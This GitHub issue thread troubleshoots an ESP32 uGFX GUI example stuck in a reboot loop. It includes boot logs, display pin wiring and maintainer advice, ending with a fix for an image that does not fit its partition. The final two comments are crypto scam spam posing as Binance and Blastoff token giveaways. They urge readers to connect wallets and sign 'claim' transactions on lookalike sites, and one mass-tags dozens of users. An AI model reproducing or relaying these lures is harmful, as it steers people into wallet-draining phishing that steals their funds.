### ISSUE TITLE
endless reboot(ugfx_example)

### ISSUE THREAD

**Issue by LeanderKo** [InfiniteYuan1/esp32-ugfx-gui#2]
rst:0xc (SW_CPU_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0018,len:4
load:0x3fff001c,len:5720
load:0x40078000,len:0
ho 12 tail 0 room 4
load:0x40078000,len:14008
entry 0x4007860c
I (30) boot: ESP-IDF v3.1-dev-828-ge37ceaed-dirty 2nd stage bootloader
I (30) boot: compile time 02:19:18
I (32) boot: Enabling RNG early entropy source...
I (37) boot: SPI Speed      : 40MHz
I (41) boot: SPI Mode       : DIO
I (45) boot: SPI Flash Size : 4MB
I (49) boot: Partition Table:
I (53) boot: ## Label            Usage          Type ST Offset   Length
I (60) boot:  0 nvs              WiFi data        01 02 00009000 00006000
I (68) boot:  1 phy_init         RF data          01 01 0000f000 00001000
I (75) boot:  2 factory          factory app      00 00 00010000 00300000
I (83) boot: End of partition table
I (87) esp_image: segment 0: paddr=0x00010020 vaddr=0x3f400020 size=0x292b74 (2698100) map
I (1040) esp_image: segment 1: paddr=0x002a2b9c vaddr=0x3ffb0000 size=0x02618 (  9752) load
I (1045) esp_image: segment 2: paddr=0x002a51bc vaddr=0x40080000 size=0x00400 (  1024) load
0x40080000: _iram_start at /Users/leander/WorkSpace/SDK/Espressif/esp-idf/components/freertos/xtensa_vectors.S:1685

I (1048) esp_image: segment 3: paddr=0x002a55c4 vaddr=0x40080400 size=0x0a408 ( 41992) load
I (1074) esp_image: segment 4: paddr=0x002af9d4 vaddr=0x400c0000 size=0x00000 (     0) load
I (1074) esp_image: segment 5: paddr=0x002af9dc vaddr=0x00000000 size=0x00634 (  1588) 
I (1081) esp_image: segment 6: paddr=0x002b0018 vaddr=0x400d0018 size=0x2bac0 (178880) map
0x400d0018: _flash_cache_start at ??:?

I (1158) boot: Loaded app from partition at offset 0x10000
I (1158) boot: Disabling RNG early entropy source...
I (1159) cpu_start: Pro cpu up.
I (1163) cpu_start: Starting app cpu, entry point is 0x40080ffc
0x40080ffc: call_start_cpu1 at /Users/leander/WorkSpace/SDK/Espressif/esp-idf/components/esp32/cpu_start.c:224

I (1154) cpu_start: App cpu up.
I (1174) heap_init: Initializing. RAM available for dynamic allocation:
I (1180) heap_init: At 3FFAE6E0 len 00001920 (6 KiB): DRAM
I (1187) heap_init: At 3FFB38E8 len 0002C718 (177 KiB): DRAM
I (1193) heap_init: At 3FFE0440 len 00003BC0 (14 KiB): D/IRAM
I (1199) heap_init: At 3FFE4350 len 0001BCB0 (111 KiB): D/IRAM
I (1206) heap_init: At 4008A808 len 000157F8 (85 KiB): IRAM
I (1212) cpu_start: Pro cpu start user code
I (224) cpu_start: Starting scheduler on PRO CPU.
I (0) cpu_start: Starting scheduler on APP CPU.
??????oets Jun  8 2016 00:22:57

rst:0xc (SW_CPU_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0018,len:4
load:0x3fff001c,len:5720
load:0x40078000,len:0
ho 12 tail 0 room 4
load:0x40078000,len:14008
entry 0x4007860c
I (30) boot: ESP-IDF v3.1-dev-828-ge37ceaed-dirty 2nd stage bootloader
I (30) boot: compile time 02:19:18
I (32) boot: Enabling RNG early entropy source...
I (37) boot: SPI Speed      : 40MHz
I (41) boot: SPI Mode       : DIO
I (45) boot: SPI Flash Size : 4MB
I (49) boot: Partition Table:
I (53) boot: ## Label            Usage          Type ST Offset   Length
I (60) boot:  0 nvs              WiFi data        01 02 00009000 00006000
I (68) boot:  1 phy_init         RF data          01 01 0000f000 00001000
I (75) boot:  2 factory          factory app      00 00 00010000 00300000
I (83) boot: End of partition table
I (87) esp_image: segment 0: paddr=0x00010020 vaddr=0x3f400020 size=0x292b74 (2698100) map
I (1040) esp_image: segment 1: paddr=0x002a2b9c vaddr=0x3ffb0000 size=0x02618 (  9752) load
I (1045) esp_image: segment 2: paddr=0x002a51bc vaddr=0x40080000 size=0x00400 (  1024) load
0x40080000: _iram_start at /Users/leander/WorkSpace/SDK/Espressif/esp-idf/components/freertos/xtensa_vectors.S:1685

I (1048) esp_image: segment 3: paddr=0x002a55c4 vaddr=0x40080400 size=0x0a408 ( 41992) load
I (1074) esp_image: segment 4: paddr=0x002af9d4 vaddr=0x400c0000 size=0x00000 (     0) load
I (1074) esp_image: segment 5: paddr=0x002af9dc vaddr=0x00000000 size=0x00634 (  1588) 
I (1081) esp_image: segment 6: paddr=0x002b0018 vaddr=0x400d0018 size=0x2bac0 (178880) map
0x400d0018: _flash_cache_start at ??:?

I (1158) boot: Loaded app from partition at offset 0x10000
I (1158) boot: Disabling RNG early entropy source...
I (1159) cpu_start: Pro cpu up.
I (1163) cpu_start: Starting app cpu, entry point is 0x40080ffc
0x40080ffc: call_start_cpu1 at /Users/leander/WorkSpace/SDK/Espressif/esp-idf/components/esp32/cpu_start.c:224

I (1154) cpu_start: App cpu up.
I (1174) heap_init: Initializing. RAM available for dynamic allocation:
I (1180) heap_init: At 3FFAE6E0 len 00001920 (6 KiB): DRAM
I (1187) heap_init: At 3FFB38E8 len 0002C718 (177 KiB): DRAM
I (1193) heap_init: At 3FFE0440 len 00003BC0 (14 KiB): D/IRAM
I (1199) heap_init: At 3FFE4350 len 0001BCB0 (111 KiB): D/IRAM
I (1206) heap_init: At 4008A808 len 000157F8 (85 KiB): IRAM
I (1212) cpu_start: Pro cpu start user code
I (224) cpu_start: Starting scheduler on PRO CPU.
I (0) cpu_start: Starting scheduler on APP CPU.
??

**Comment by InfiniteYuan** [comment]
@LeanderKo 你使用的是什么开发板

**Comment by InfiniteYuan** [comment]
请更新一下库，
使用“make defconfig” 默认配置，试一试

**Comment by LeanderKo** [comment]
ST7789H2

**Comment by LeanderKo** [comment]
MISO——23
MOSI——25
CLK——19
CS——22
DC——23
RST——18
BL——17

**Comment by InfiniteYuan** [comment]
请详细描述一下你的开发环境，

**Comment by MamaTierra** [comment]
I have the same problem, I use the ILI9341 screen.

How can I configure this in the project ?

**Comment by InfiniteYuan** [comment]
Ok, you can try to  enable spiram to run example

**Comment by fburel** [comment]
I tried to run the project and have a similar problem of endless reset.
Any Idea what to do?
Thanks in advance.

| NAME  |  VALUE
| -- | --
|  BOARD TYPE | ESP32 WROOVER
| SCREEN DRIVER | ILI9341
|  TOUCH SCREEN DRIVER | XPT2046
| CLK | 22
| MOSI | 21
| MISO | 27
| CS(LCD) | 5
| DC | 19
| RESET | 18
| LED | 23
| CS(Touch) | 32
| IRQ | 33


    st:0x3 (SW_RESET),boot:0x17 (SPI_FAST_FLASH_BOOT)
    configsip: 0, SPIWP:0xee
    clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
    mode:DIO, clock div:2
    load:0x3fff0018,len:4
    load:0x3fff001c,len:6304
    ho 0 tail 12 room 4
    load:0x40078000,len:11624
    ho 0 tail 12 room 4
    load:0x40080400,len:6648
    entry 0x40080764
    [0;32mI (64) boot: ESP-IDF v3.3 2nd stage bootloader[0m
    [0;32mI (64) boot: compile time 15:56:50[0m
    [0;32mI (64) boot: Enabling RNG early entropy source…[0m
    [0;32mI (69) boot: SPI Speed      : 40MHz[0m
    [0;32mI (73) boot: SPI Mode       : DIO[0m
    [0;32mI (77) boot: SPI Flash Size : 4MB[0m
    [0;32mI (81) boot: Partition Table:[0m
    [0;32mI (85) boot: ## Label            Usage          Type ST Offset   Length[0m
    [0;32mI (92) boot:  0 nvs              WiFi data        01 02 00009000 00006000[0m
    [0;32mI (99) boot:  1 phy_init         RF data          01 01 0000f000 00001000[0m
    [0;32mI (107) boot:  2 factory          factory app      00 00 00010000 00100000[0m
    [0;32mI (114) boot: End of partition table[0m
    [0;32mI (119) esp_image: segment 0: paddr=0x00010020 vaddr=0x3f400020 size=0x294424     (2704420) map[0m
    [0;32mI (1077) esp_image: segment 1: paddr=0x002a444c vaddr=0x3ffb0000 size=0x022ac (  8876) load[0m
    [0;32mI (1081) esp_image: segment 2: paddr=0x002a6700 vaddr=0x40080000 size=0x00400 (  1024) load[0m
    [0;32mI (1084) esp_image: segment 3: paddr=0x002a6b08 vaddr=0x40080400 size=0x09508 ( 38152) load[0m
    [0;32mI (1109) esp_image: segment 4: paddr=0x002b0018 vaddr=0x400d0018 size=0x2d8ec (186604) map[0m
    [0;32mI (1174) esp_image: segment 5: paddr=0x002dd90c vaddr=0x40089908 size=0x00994 (  2452) load[0m
    [0;31mE (1176) esp_image: Image length 2941648 doesn’t fit in partition length 1048576[0m
    [0;31mE (1180) boot: Factory app partition is not bootable[0m
    [0;31mE (1186) boot: No bootable app partitions in the partition table[0m
    ets Jun  8 2016 00:22:57

**Comment by InfiniteYuan** [comment]
esp_image: Image length 2941648 doesn’t fit in partition length 1048576�[

we can modify flash configuration to 4MB and modify  parition.csv file.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by gagania** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mrzzcn, @biglyan, @hunimama, @songlipeng2003, @umaron, @zicai1026, @halfpi, @caizongchao, @wwhai, @infobull, @frankswu, @LikeWY, @punghunger, @handlerww, @aminocaid, @cosyman, @jstbibo, @zhoulipeng, @chengjunjian, @androids7, @blackzw, @gokonchen, @cfping, @0x1abin, @aplgsd, @AppServiceProvider, @VIGILI, @TOMGOU, @huzm08, @TMODER, @Kiritow, @scriptiot-dev, @tchigher, @CherishEX, @vae1970, @stardemo, @EthanTC, @chengxuewen, @wzedmund, @ssqf, @wyscjm, @sage-xiong, @eagleHovering, @JesseGuoX, @culmjoker, @wangrui0610, @haigeno1, @kuangdazzidd, @jichuanyuan, @zclk
